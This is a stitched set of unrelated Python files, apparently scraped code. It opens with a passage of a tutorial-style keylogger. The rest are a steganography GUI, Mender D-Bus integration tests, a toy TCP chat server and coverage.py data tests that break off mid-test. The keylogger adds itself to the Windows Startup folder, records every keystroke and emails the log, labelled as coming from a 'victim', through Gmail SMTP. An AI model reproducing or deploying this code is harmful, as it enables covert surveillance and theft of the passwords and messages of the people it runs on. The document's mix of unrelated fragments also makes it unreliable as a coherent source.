destination = r'C:\Users\{}\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'.format(username)
#now write the main method for creating the shortcut file in the startup folder
def main():
path = os.path.join(destination, "keylogger.pyw - Shortcut.lnk")#here set the path along with its name & extension
#now we have to set the link file source
target = r""+cwd+"\keylogger.pyw"
#now set the current file icon for it
icon = r""+cwd+"\keylogger.pyw"
for files in source:
if files == "keylogger.pyw":
#here we pass all the objects we created to set the icon, path & target etc.
shell = Dispatch('WScript.Shell')
shortcut = shell.CreateShortCut(path)
shortcut.Targetpath = target
shortcut.IconLocation = icon
shortcut.save()
#it's done, let's call it by writing the function name
#we also check whether it currently exists in the startup folder or not
shortcut = 'keylogger.pyw - Shortcut.lnk'
if shortcut in destination:
pass
else:
main()
# also write a function to check the internet connection
# it helps us call send_email only when the internet is working
def is_connected():
try:
socket.create_connection(("www.google.com", 80))
return True
except OSError:
pass
return False
# now write a function to send an email with an attachment
def send_email():
# first enable the less secure app permission of the sender email address.
# I'll provide a link about the secure app permission in the video description.
fromaddr = 'example@gmail.com'
toaddr = 'example@gmail.com'
password = 'yourpassword'
# instance of MIMEMultipart
msg = MIMEMultipart()
# storing the senders email address
msg['From'] = fromaddr
# storing the receivers email address
msg['To'] = toaddr
# storing the subject
msg['Subject'] = "data"
# string to store the body of the mail
body = "keylog from victim"
# attach the body with the msg instance
msg.attach(MIMEText(body, 'plain'))
# open the file to be sent
attachment = open(filename, "rb")
# instance of MIMEBase and named as part
part = MIMEBase('application', 'octet-stream')
# To change the payload into encoded form
part.set_payload((attachment).read())
# encode into base64
encoders.encode_base64(part)
part.add_header('Content-Disposition', "attachment; filename= %s" % filename)
# attach the instance 'part' to instance 'msg'
msg.attach(part)
# creates SMTP session
server = smtplib.SMTP('smtp.gmail.com', 587)
# start TLS for security
server.starttls()
# Authentication
server.login(fromaddr, password)
# Converts the Multipart msg into a string
text = msg.as_string()
# sending the mail
server.sendmail(fromaddr, toaddr, text)
# terminating the session
server.quit()
#now write the write_file method, which appends captured keys to the log file
def write_file(keys):
with open(filename,"a") as f:
for key in keys:#we look at each key and based on that perform an action.
if key == 'Key.enter':#for enter it write a new line.
f.write("\n")
elif key == 'Key.space':#for space it will enter a space
f.write(key.replace("Key.space"," "))
elif key == 'Key.backspace':#for backspace it will enter a $
f.write(key.replace("Key.backspace","$")) # EX. well$come --> welcome (Actual word) , another example hellll$$$o --> helo (actual word) [hope it helps you to understand]
elif key[:4] == word:#for others we just pass no need to store
pass
else:#for the remaining characters we write them into the file.
f.write(key.replace("'",""))
# now write a function which takes the key as a parameter
def on_press(key):
global keys, count, countInternet, filename
# now append key into list as a string
keys.append(str(key))
# and check the list length; based on the length of the list we write the keys into the txt file
if len(keys) > 10:
#here call write_file, a function which takes the list (keys) as a parameter
write_file(keys)
# now write an if/else condition to check the internet connection, and if it's true then call the send_email function.
if is_connected():
count += 1 #increment the counter; once it reaches 100 the send_email function is called
#print('connected {}'.format(count))#just printing to monitor counting
if count > 100:
count = 0 # reset to zero so it starts from the beginning
#now call send_email on a Thread because it takes time and we don't want to miss the user's keyboard input.
t1 = threading.Thread(target=send_email, name='t1')
t1.start()#now call by start
else:
# the else branch executes when the internet connection is not working
countInternet += 1
# printing the status for monitor
#print('not connected',countInternet)
# when the internet connection is not working, the file will not be sent by email
# so we copy the file from the temp folder to the current directory, where it is easier to access than digging through the temp folder manually
if countInternet > 10:
countInternet = 0
filename = filename.strip(save) # here we strip off the path and keep only the file name
# now look for txt file in temp folder
for files in save:
if files == filename:
shutil.copy(files+"t",source)#when we strip the path but it also strip the last letter 't' from extension so add it once again.
#at the end of the if/else block, clear the list so it's ready to capture/save further keys.
keys.clear()
#create an instance of Listener, define the on_press method in a with statement, and then join the instance to the main thread.
with Listener(on_press=on_press) as listener:
listener.join()
#that's it
|
main.py
|
# ============================================================================================
# MIT License
# Copyright (c) 2020 Konstantinos Bourantas
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ============================================================================================
import lsbSteg
import tkinter as tk
import tkinter.ttk as ttk
from tkinter.filedialog import askdirectory
from tkinter import filedialog
import threading
from ttkthemes import ThemedTk
import sys
import pyfiglet
from PIL import ImageTk, Image
# ============================================================================================
class pyHide:
def __init__(self, root, image=None):
root.minsize(700, 700)
root.title('PyHide')
# icon made by : https://www.flaticon.com/authors/becris
ico = Image.open('../icon.png')
photo = ImageTk.PhotoImage(ico)
root.wm_iconphoto(False, photo)
self.checkboxExport = None
self.exportOpt = 0
self.imagePath = None
self.root = root
self.frame = ttk.Frame(root)
self.frame.grid(row=0, column=1, rowspan=5, pady=30, padx=10)
# -----------------------------------------------
self.dirLabel = ttk.Label(self.frame, font=25, text="Image Path:")
self.dirLabel.grid(row=0, column=0, sticky=tk.W)
self.imagePathEntry = ttk.Entry(self.frame, font=40, width="50")
self.imagePathEntry.grid(row=0, column=1)
self.passLabel = ttk.Label(self.frame, font=25, text="Password:")
self.passLabel.grid(row=1, column=0, sticky=tk.W)
self.passwordEntry = ttk.Entry(
self.frame, show="*", font=40, width="50")
self.passwordEntry.grid(row=1, column=1)
self.btnChooseDir = ttk.Button(self.frame, text="Open", width=8,
command=lambda: self.selectImage())
self.btnChooseDir.grid(row=0, column=2)
# --------------------------------------------------------------------------------------------
# radio buttons
self.radioOption = tk.StringVar(value="")
self.radioEncode = ttk.Radiobutton(
self.frame, text="Encode", variable=self.radioOption, value='Encode', command=lambda: self.radioBtnCallback('Encode'))
self.radioEncode.grid(row=2, column=0)
self.radioDecode = ttk.Radiobutton(
self.frame, text="Decode", variable=self.radioOption, value='Decode', command=lambda: self.radioBtnCallback('Decode'))
self.radioDecode.grid(row=2, column=1, sticky=tk.W)
self.textArea = tk.Text(self.frame, height=30,
width=40, bg="black", fg="purple", insertbackground="purple")
self.textArea.config(state='normal')
self.textArea.grid(row=3, column=1, columnspan=1, rowspan=2,
sticky=tk.W+tk.E+tk.N+tk.S, pady=5)
# --------------------------------------------------------------------------------------------
# ascii banner
self.ascii_banner = pyfiglet.figlet_format('pyHide')
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
# --------------------------------------------------------------------------------------------
# progress bar
self.progressBar = ttk.Progressbar(
self.frame, orient="horizontal", length=550, mode="indeterminate")
# --------------------------------------------------------------------------------------------
# cancel button
self.btnCancel = ttk.Button(self.frame, text="Exit", width=8,
command=lambda: sys.exit(1))
self.btnCancel.grid(row=6, column=2, sticky=tk.W, pady=10)
root.mainloop()
# --------------------------------------------------------------------------------------------
# Buttons callbacks functions
def imageSteg(self):
"""Encode/Decode operations on selected image"""
if self.btnOpImage['text'] == 'Encode':
# Encode message to the selected image
self.textArea.insert(tk.END, "\n[*]Encoding...")
self.subThread = threading.Thread(
target=lsbSteg.encodeImage, args=(self.imagePathEntry.get(),
self.textArea.get("1.0", tk.END).split('[*]Encoding...')[0].split('[*]Enter message:')[-1], self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
else:
# Decode message from the selected image
self.textArea.insert(tk.END, f"\n[*]Decoding {self.imagePath}")
self.subThread = threading.Thread(
target=lsbSteg.decodeImage, args=(self.imagePathEntry.get(), self))
self.progressBar.grid(row=5, column=1, columnspan=1, sticky=tk.W)
self.progressBar.start()
self.subThread.start()
self.root.after(100, self.checkThread)
# --------------------------------------------------------------------------------------------
def checkThread(self):
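"""Poll the worker thread every 100 ms and stop the progress bar once it finishes."""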
if (self.subThread.is_alive()):
self.root.after(100, self.checkThread)
return
else:
self.progressBar.stop()
self.progressBar.grid_remove()
# --------------------------------------------------------------------------------------------
def radioBtnCallback(self, text):
self.textArea.delete('1.0', tk.END)
self.textArea.insert(
tk.END, self.ascii_banner+"\n========================================================")
if text == "Encode":
self.textArea.insert(tk.END, "\n[*]Enter message:")
if self.checkboxExport:
self.checkboxExport.grid_remove()
else:
self.exportOpt = tk.IntVar()
self.checkboxExport = ttk.Checkbutton(
self.frame, text="Export to file", variable=self.exportOpt)
self.checkboxExport.grid(row=2, column=2, sticky=tk.E)
self.btnOpImage = ttk.Button(self.frame, text=text, width=8,
command=lambda: self.imageSteg(), state="normal" if self.imagePath else "disabled")
self.btnOpImage.grid(row=1, column=2)
# --------------------------------------------------------------------------------------------
def selectImage(self):
"""Open an image from a directory"""
# Select the Imagename from a folder
tk.Tk().withdraw()
self.imagePath = filedialog.askopenfilename(title='Open Image')
self.imagePathEntry.delete(0, tk.END)
self.imagePathEntry.insert(tk.INSERT, self.imagePath)
# opens the image
img = Image.open(self.imagePath)
# resize the image and apply a high-quality down sampling filter
img = img.resize((200, 200), Image.ANTIALIAS)
# PhotoImage class is used to add image to widgets, icons etc
img = ImageTk.PhotoImage(img)
# create a label
self.panel = ttk.Label(self.frame, image=img)
# set the image as img
self.panel.image = img
self.panel.grid(row=3, column=0, padx=5)
try:
self.btnOpImage['state'] = 'normal'
except AttributeError:
# btnOpImage is only created after a radio button has been selected
pass
# ============================================================================================
if __name__ == "__main__":
root = ThemedTk(background=True, theme="equilux")
pyHide(root)
# ============================================================================================
|
test_dbus.py
|
#!/usr/bin/python
# Copyright 2020 Northern.tech AS
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import pytest
import tempfile
import time
from multiprocessing import Process
from utils.common import put_no_sftp
MENDER_CONF = """{
"InventoryPollIntervalSeconds": 5,
"RetryPollIntervalSeconds": 5,
"ServerURL": "https://docker.mender.io:8443",
"DBus": {
"Enabled": true
}
}
"""
MENDER_STATE_FILES = (
"/var/lib/mender/mender-agent.pem",
"/var/lib/mender/mender-store",
"/var/lib/mender/mender-store-lock",
)
@pytest.fixture
def setup_mender_client_dbus(request, bitbake_variables, connection):
conffile = "/data/etc/mender/mender.conf"
conffile_bkp = f"{conffile}.backup"
bdir = os.path.dirname(conffile_bkp)
result = connection.run(
f"mkdir -p {bdir} && if [ -e {conffile} ]; then cp {conffile} {conffile_bkp}; fi"
)
assert result.exited == 0
tf = tempfile.NamedTemporaryFile()
with open(tf.name, "w") as fd:
fd.write(MENDER_CONF)
put_no_sftp(tf.name, connection, remote=conffile)
hostsfile = "/data/etc/hosts"
hostsfile_bkp = f"{hostsfile}.backup"
connection.run(
f"cp {hostsfile} {hostsfile_bkp} && echo 127.0.0.1 docker.mender.io >> {hostsfile}"
)
def fin():
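# Restore via dd into $(realpath ...) so the content is written through a
# possible symlink rather than replacing the link itself (presumed intent).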
connection.run(
f"if [ -e {conffile_bkp} ]; then dd if={conffile_bkp} of=$(realpath {conffile}); fi"
)
connection.run(
f"if [ -e {hostsfile_bkp} ]; then dd if={hostsfile_bkp} of=$(realpath {hostsfile}); fi"
)
request.addfinalizer(fin)
@pytest.mark.usefixtures("setup_board", "bitbake_path")
@pytest.mark.not_for_machine("vexpress-qemu-flash")
class TestDBus:
# this is a portion of the JWT token served by the Mender mock server:
# see: meta-mender-ci/recipes-testing/mender-mock-server/mender-mock-server.py
JWT_TOKEN = "eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9."
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_system_configuration_file(self, bitbake_variables, connection):
"""Test that D-Bus configuration file is correctly installed."""
output = connection.run(
"cat /usr/share/dbus-1/system.d/io.mender.AuthenticationManager.conf"
).stdout.strip()
assert "io.mender.AuthenticationManager" in output
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_non_root_access(self, bitbake_variables, connection):
"""Test that only root user can access Mender DBus API."""
# This is the command that is expected to fail for non-root user
dbus_send_command = "dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.GetJwtToken"
try:
connection.run("mender bootstrap", warn=True)
connection.run("systemctl start mender-client")
# Wait one state machine cycle for the D-Bus API to be available
for _ in range(12):
result = connection.run("journalctl -u mender-client")
if "Authorize failed:" in result.stdout:
break
time.sleep(5)
else:
pytest.fail("failed to detect a full state machine cycle")
result = connection.run(dbus_send_command)
assert "string" in result.stdout, result.stdout
result = connection.run(
"sudo -u mender-ci-tester %s" % dbus_send_command, warn=True
)
assert result.exited == 1
assert (
"Error org.freedesktop.DBus.Error.AccessDenied" in result.stderr
), result.stderr
finally:
connection.run("systemctl stop mender-client")
connection.run("rm -f %s" % " ".join(MENDER_STATE_FILES))
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_get_jwt_token(
self, bitbake_variables, connection, setup_mender_client_dbus
):
"""Test the JWT token can be retrieved using D-Bus."""
try:
# bootstrap the client
result = connection.run("mender bootstrap --forcebootstrap")
assert result.exited == 0
# start the mender-client service
result = connection.run("systemctl start mender-client")
assert result.exited == 0
# get the JWT token via D-Bus
output = ""
for i in range(12):
result = connection.run(
"dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.GetJwtToken || true"
)
if self.JWT_TOKEN in result.stdout:
output = result.stdout
break
time.sleep(5)
assert f'string "{self.JWT_TOKEN}' in output
finally:
connection.run("systemctl stop mender-client")
connection.run("rm -f %s" % " ".join(MENDER_STATE_FILES))
@pytest.mark.min_mender_version("2.5.0")
def test_dbus_fetch_jwt_token(
self, bitbake_variables, connection, second_connection, setup_mender_client_dbus
):
"""Test the JWT token can be fetched using D-Bus."""
# bootstrap the client
result = connection.run("mender bootstrap --forcebootstrap")
assert result.exited == 0
try:
# start monitoring the D-Bus
def dbus_monitor():
second_connection.run(
"dbus-monitor --system \"type='signal',interface='io.mender.Authentication1'\" > /tmp/dbus-monitor.log"
)
p = Process(target=dbus_monitor, daemon=True)
p.start()
# get the JWT token via D-Bus
try:
# start the mender-client service
result = connection.run("systemctl start mender-client")
assert result.exited == 0
# fetch the JWT token
fetched = False
for i in range(12):
result = connection.run(
"dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.FetchJwtToken || true"
)
if "true" in result.stdout:
fetched = True
break
time.sleep(5)
# fetch was successful
assert fetched
# verify we received the D-Bus signal JwtTokenStateChange and that it contains the JWT token
found = False
output = ""
for i in range(12):
output = connection.run("cat /tmp/dbus-monitor.log").stdout.strip()
if (
"path=/io/mender/AuthenticationManager; interface=io.mender.Authentication1; member=JwtTokenStateChange"
in output
):
found = True
break
time.sleep(5)
assert found, output
# token is now available
result = connection.run(
"dbus-send --system --dest=io.mender.AuthenticationManager --print-reply /io/mender/AuthenticationManager io.mender.Authentication1.GetJwtToken"
)
assert result.exited == 0
output = result.stdout.strip()
assert f'string "{self.JWT_TOKEN}' in output
finally:
p.terminate()
connection.run("systemctl stop mender-client")
connection.run("rm -f /tmp/dbus-monitor.log")
finally:
connection.run("rm -f %s" % " ".join(MENDER_STATE_FILES))
|
colab_servertest.py
|
from socket import *
import sys
import threading
import time
from time import localtime
import imp
HOST = '127.0.0.1'
PORT = 1234 # listening port
BUFSIZ = 1024
if sys.version[0] == '2':
imp.reload(sys)
sys.setdefaultencoding("utf-8")
class TcpServer():
def __init__(self):
self.ADDR = (HOST, PORT)
try:
self.STOP_CHAT = False
self.sock = socket(AF_INET, SOCK_STREAM)
print('%d is open' % PORT)
self.sock.bind(self.ADDR)
self.sock.listen(5)
# set the exit condition
# all connected clients
self.clients = {}
self.thrs = {}
self.stops = []
except Exception as e:
print("%d is down" % PORT)
return None
def listen_client(self):
while not self.STOP_CHAT:
print(u'Waiting for connections, listening on port: %d' % (PORT))
self.tcpClientSock, self.addr = self.sock.accept()
print(u'Connection accepted, client address:', self.addr)
address = self.addr
# put the established client socket into self.clients
self.clients[address] = self.tcpClientSock
# put each established connection into its own thread to receive and dispatch messages
self.thrs[address] = threading.Thread(target=self.readmsg, args=[address])
self.thrs[address].start()
time.sleep(0.5)
#self.tcpClientSock.send(b'you are connect...')
print(u'Server stopped')
def readmsg(self, address):
# if the address does not exist, return False
if address not in self.clients:
return False
# get the client socket that sent the message
client = self.clients[address]
while True:
try:
# receive the message content into data
data = client.recv(BUFSIZ)
except Exception as error:
print(error)
self.close_client(address)
break
if not data:
break
# python3 uses bytes, so the data has to be decoded
# s = '%s sent me the message: [%s] %s' % (addr[0], ctime(), data.decode('utf8'))
# format the date
ISOTIMEFORMAT = '%Y-%m-%d %X'
stime = time.strftime(ISOTIMEFORMAT, localtime())
print([address], '@',[stime],':', data.decode('utf8'))
self.STOP_CHAT = (data.decode('utf8').upper() == "QUIT")
if self.STOP_CHAT:
print("quit")
self.close_client(address)
print("already quit")
break
def close_client(self, address):
try:
'''
print(u'try leave')
client = self.clients.pop(address)
print(u'try leave1')
self.stops.append(address)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
for k in list(self.clients):  # iterate over a copy since we pop inside the loop
print(u'try leave')
print(u'try client1:', [self.clients[k]])
print(u'try client2:', [self.clients[address]])
print(u'try client3:', [k])
print(u'try client4:', [address])
client = self.clients.pop(k)
#print(u'try leave1')
#self.stops.append(k)
print(u'try leave2')
client.close()
print(u'try leave3')
'''
print(u'try leave4:client:',[self.clients[k]])
self.clients[k].send(str(address) + u" has left")
'''
except:
print(u'try fault')
pass
print(str(address) + u' has disconnected')
tserver = None
while tserver == None:
tserver = TcpServer()
tserver.listen_client()
print(u'Server stopped')
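# A minimal client sketch for manually exercising this server (assumed usage,
# not part of the original file):
#
#   from socket import socket, AF_INET, SOCK_STREAM
#   c = socket(AF_INET, SOCK_STREAM)
#   c.connect(('127.0.0.1', 1234))
#   c.send(u'hello'.encode('utf8'))
#   c.send(u'QUIT'.encode('utf8'))  # the server shuts down when it reads "QUIT"
#   c.close()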
|
test_data.py
|
# Licensed under the Apache License: http://www.apache.org/licenses/LICENSE-2.0
# For details: https://github.com/nedbat/coveragepy/blob/master/NOTICE.txt
"""Tests for coverage.data"""
import glob
import os
import os.path
import re
import sqlite3
import threading
from unittest import mock
import pytest
from coverage.data import CoverageData, combine_parallel_data
from coverage.data import add_data_to_hash, line_counts
from coverage.debug import DebugControlString
from coverage.exceptions import DataError, NoDataError
from coverage.files import PathAliases, canonical_filename
from tests.coveragetest import CoverageTest
from tests.helpers import assert_count_equal
LINES_1 = {
'a.py': {1, 2},
'b.py': {3},
}
SUMMARY_1 = {'a.py': 2, 'b.py': 1}
MEASURED_FILES_1 = ['a.py', 'b.py']
A_PY_LINES_1 = [1, 2]
B_PY_LINES_1 = [3]
LINES_2 = {
'a.py': {1, 5},
'c.py': {17},
}
SUMMARY_1_2 = {'a.py': 3, 'b.py': 1, 'c.py': 1}
MEASURED_FILES_1_2 = ['a.py', 'b.py', 'c.py']
ARCS_3 = {
'x.py': {(-1, 1), (1, 2), (2, 3), (3, -1)},
'y.py': {(-1, 17), (17, 23), (23, -1)},
}
X_PY_ARCS_3 = [(-1, 1), (1, 2), (2, 3), (3, -1)]
Y_PY_ARCS_3 = [(-1, 17), (17, 23), (23, -1)]
SUMMARY_3 = {'x.py': 3, 'y.py': 2}
MEASURED_FILES_3 = ['x.py', 'y.py']
X_PY_LINES_3 = [1, 2, 3]
Y_PY_LINES_3 = [17, 23]
ARCS_4 = {
'x.py': {(-1, 2), (2, 5), (5, -1)},
'z.py': {(-1, 1000), (1000, -1)},
}
SUMMARY_3_4 = {'x.py': 4, 'y.py': 2, 'z.py': 1}
MEASURED_FILES_3_4 = ['x.py', 'y.py', 'z.py']
def DebugCoverageData(*args, **kwargs):
"""Factory for CovergeData instances with debugging turned on.
This lets us exercise the debugging lines in sqldata.py. We don't make
any assertions about the debug output, but at least we can know that they
execute successfully, and they won't be marked as distracting missing
lines in our coverage reports.
"""
assert "debug" not in kwargs
options = ["dataio", "dataop", "sql"]
if kwargs:
# There's no reason kwargs should imply sqldata debugging.
# This is a way to get a mix of debug options across the tests.
options.extend(["sqldata"])
debug = DebugControlString(options=options)
return CoverageData(*args, debug=debug, **kwargs)
def assert_line_counts(covdata, counts, fullpath=False):
"""Check that the line_counts of `covdata` is `counts`."""
assert line_counts(covdata, fullpath) == counts
def assert_measured_files(covdata, measured):
"""Check that `covdata`'s measured files are `measured`."""
assert_count_equal(covdata.measured_files(), measured)
def assert_lines1_data(covdata):
"""Check that `covdata` has the data from LINES1."""
assert_line_counts(covdata, SUMMARY_1)
assert_measured_files(covdata, MEASURED_FILES_1)
assert_count_equal(covdata.lines("a.py"), A_PY_LINES_1)
assert not covdata.has_arcs()
def assert_arcs3_data(covdata):
"""Check that `covdata` has the data from ARCS3."""
assert_line_counts(covdata, SUMMARY_3)
assert_measured_files(covdata, MEASURED_FILES_3)
assert_count_equal(covdata.lines("x.py"), X_PY_LINES_3)
assert_count_equal(covdata.arcs("x.py"), X_PY_ARCS_3)
assert_count_equal(covdata.lines("y.py"), Y_PY_LINES_3)
assert_count_equal(covdata.arcs("y.py"), Y_PY_ARCS_3)
assert covdata.has_arcs()
def dicts_from_sets(file_data):
"""Convert a dict of sets into a dict of dicts.
Before 6.0, file data was a dict with None as the values. In 6.0, file
data is a set. SqlData all along only cared that it was an iterable.
This function helps us test that the old dict format still works.
"""
return {k: dict.fromkeys(v) for k, v in file_data.items()}
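# Illustrative example (not from the original test data):
#   dicts_from_sets({'a.py': {1, 2}}) == {'a.py': {1: None, 2: None}}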
class CoverageDataTest(CoverageTest):
"""Test cases for CoverageData."""
def test_empty_data_is_false(self):
covdata = DebugCoverageData()
assert not covdata
self.assert_doesnt_exist(".coverage")
def test_empty_data_is_false_when_read(self):
covdata = DebugCoverageData()
covdata.read()
assert not covdata
self.assert_doesnt_exist(".coverage")
def test_line_data_is_true(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
assert covdata
def test_arc_data_is_true(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
assert covdata
def test_empty_line_data_is_false(self):
covdata = DebugCoverageData()
covdata.add_lines({})
assert not covdata
def test_empty_arc_data_is_false(self):
covdata = DebugCoverageData()
covdata.add_arcs({})
assert not covdata
@pytest.mark.parametrize("lines", [LINES_1, dicts_from_sets(LINES_1)])
def test_adding_lines(self, lines):
covdata = DebugCoverageData()
covdata.add_lines(lines)
assert_lines1_data(covdata)
@pytest.mark.parametrize("arcs", [ARCS_3, dicts_from_sets(ARCS_3)])
def test_adding_arcs(self, arcs):
covdata = DebugCoverageData()
covdata.add_arcs(arcs)
assert_arcs3_data(covdata)
def test_ok_to_add_lines_twice(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
covdata.add_lines(LINES_2)
assert_line_counts(covdata, SUMMARY_1_2)
assert_measured_files(covdata, MEASURED_FILES_1_2)
def test_ok_to_add_arcs_twice(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.add_arcs(ARCS_4)
assert_line_counts(covdata, SUMMARY_3_4)
assert_measured_files(covdata, MEASURED_FILES_3_4)
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_cant_add_arcs_with_lines(self, klass):
covdata = klass()
covdata.add_lines(LINES_1)
msg = "Can't add branch measurements to existing line data"
with pytest.raises(DataError, match=msg):
covdata.add_arcs(ARCS_3)
@pytest.mark.parametrize("klass", [CoverageData, DebugCoverageData])
def test_cant_add_lines_with_arcs(self, klass):
covdata = klass()
covdata.add_arcs(ARCS_3)
msg = "Can't add line measurements to existing branch data"
with pytest.raises(DataError, match=msg):
covdata.add_lines(LINES_1)
def test_touch_file_with_lines(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
assert_measured_files(covdata, MEASURED_FILES_1 + ['zzz.py'])
def test_touch_file_with_arcs(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
assert_measured_files(covdata, MEASURED_FILES_3 + ['zzz.py'])
def test_set_query_contexts(self):
covdata = DebugCoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
covdata.set_query_contexts(['te.*a'])
assert covdata.lines('a.py') == [1, 2]
covdata.set_query_contexts(['other'])
assert covdata.lines('a.py') == []
def test_no_lines_vs_unmeasured_file(self):
covdata = DebugCoverageData()
covdata.add_lines(LINES_1)
covdata.touch_file('zzz.py')
assert covdata.lines('zzz.py') == []
assert covdata.lines('no_such_file.py') is None
def test_lines_with_contexts(self):
covdata = DebugCoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
assert covdata.lines('a.py') == [1, 2]
covdata.set_query_contexts(['test'])
assert covdata.lines('a.py') == [1, 2]
covdata.set_query_contexts(['other'])
assert covdata.lines('a.py') == []
def test_contexts_by_lineno_with_lines(self):
covdata = DebugCoverageData()
covdata.set_context('test_a')
covdata.add_lines(LINES_1)
expected = {1: ['test_a'], 2: ['test_a']}
assert covdata.contexts_by_lineno('a.py') == expected
@pytest.mark.parametrize("lines", [LINES_1, dicts_from_sets(LINES_1)])
def test_no_duplicate_lines(self, lines):
covdata = DebugCoverageData()
covdata.set_context("context1")
covdata.add_lines(lines)
covdata.set_context("context2")
covdata.add_lines(lines)
assert covdata.lines('a.py') == A_PY_LINES_1
@pytest.mark.parametrize("arcs", [ARCS_3, dicts_from_sets(ARCS_3)])
def test_no_duplicate_arcs(self, arcs):
covdata = DebugCoverageData()
covdata.set_context("context1")
covdata.add_arcs(arcs)
covdata.set_context("context2")
covdata.add_arcs(arcs)
assert covdata.arcs('x.py') == X_PY_ARCS_3
def test_no_arcs_vs_unmeasured_file(self):
covdata = DebugCoverageData()
covdata.add_arcs(ARCS_3)
covdata.touch_file('zzz.py')
assert covdata.lines('zzz.py') == []
assert covdata.lines('no_such_file.py') is None
assert covdata.arcs('zzz.py') == []
assert covdata.arcs('no_such_file.py') is None
def test_arcs_with_contexts(self):
covdata = DebugCoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
assert covdata.arcs('x.py') == [(-1, 1), (1, 2), (2, 3), (3, -1)]
covdata.set_query_contexts(['test_.$'])
assert covdata.arcs('x.py') == [(-1, 1), (1, 2), (2, 3), (3, -1)]
covdata.set_query_contexts(['other'])
assert covdata.arcs('x.py') == []
def test_contexts_by_lineno_with_arcs(self):
covdata = DebugCoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
expected = {1: ['test_x'], 2: ['test_x'], 3: ['test_x']}
assert covdata.contexts_by_lineno('x.py') == expected
def test_contexts_by_lineno_with_unknown_file(self):
covdata = DebugCoverageData()
covdata.set_context('test_x')
covdata.add_arcs(ARCS_3)
assert covdata.contexts_by_lineno('xyz.py') == {}
def test_context_by_lineno_with_query_contexts_with_lines(self):
covdata = DebugCoverageData()
covdata.set_context("test_1")
covdata.add_lines(LINES_1)
covdata.set_context("test_2")
covdata.add_lines(LINES_2)
covdata.set_query_context("test_1")
assert covdata.contexts_by_lineno("a.py") == dict.fromkeys([1,2], ["test_1"])
def test_context_by_lineno_with_query_contexts_with_arcs(self):
covdata = DebugCoverageData()
covdata.set_context("test_1")
covdata.add_arcs(ARCS_3)
covdata.set_context("test_2")
covdata.add_arcs(ARCS_4)
covdata.set_query_context("test_1")
assert covdata.contexts_by_lineno("x.py") == dict.fromkeys([1,2,3], ["test_1"])
def test_file_tracer_name(self):
covdata = DebugCoverageData()
covdata.add_lines({
"p1.foo": [1, 2, 3],
"p2.html": [10, 11, 12],
"main.py": [20],
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "p2.html": "p2.plugin"})
assert covdata.file_tracer("p1.foo") == "p1.plugin"
assert covdata.file_tracer("p2.html") == "p2.plugin"
assert covdata.file_tracer("main.py") == ""
assert covdata.file_tracer("p3.not_here") is None
def test_ok_to_repeat_file_tracer(self):
covdata = DebugCoverageData()
covdata.add_lines({
"p1.foo": [1, 2, 3],
"p2.html": [10, 11, 12],
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "p2.html": "p2.plugin"})
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
assert covdata.file_tracer("p1.foo") == "p1.plugin"
def test_ok_to_set_empty_file_tracer(self):
covdata = DebugCoverageData()
covdata.add_lines({
"p1.foo": [1, 2, 3],
"p2.html": [10, 11, 12],
"main.py": [20],
})
covdata.add_file_tracers({"p1.foo": "p1.plugin", "main.py": ""})
assert covdata.file_tracer("p1.foo") == "p1.plugin"
assert covdata.file_tracer("main.py") == ""
def test_cant_file_tracer_unmeasured_files(self):
covdata = DebugCoverageData()
msg = "Can't add file tracer data for unmeasured file 'p1.foo'"
with pytest.raises(DataError, match=msg):
covdata.add_file_tracers({"p1.foo": "p1.plugin"})
covdata.add_lines({"p2.html": [10, 11, 12]})
with pytest.raises(DataError, match=msg):
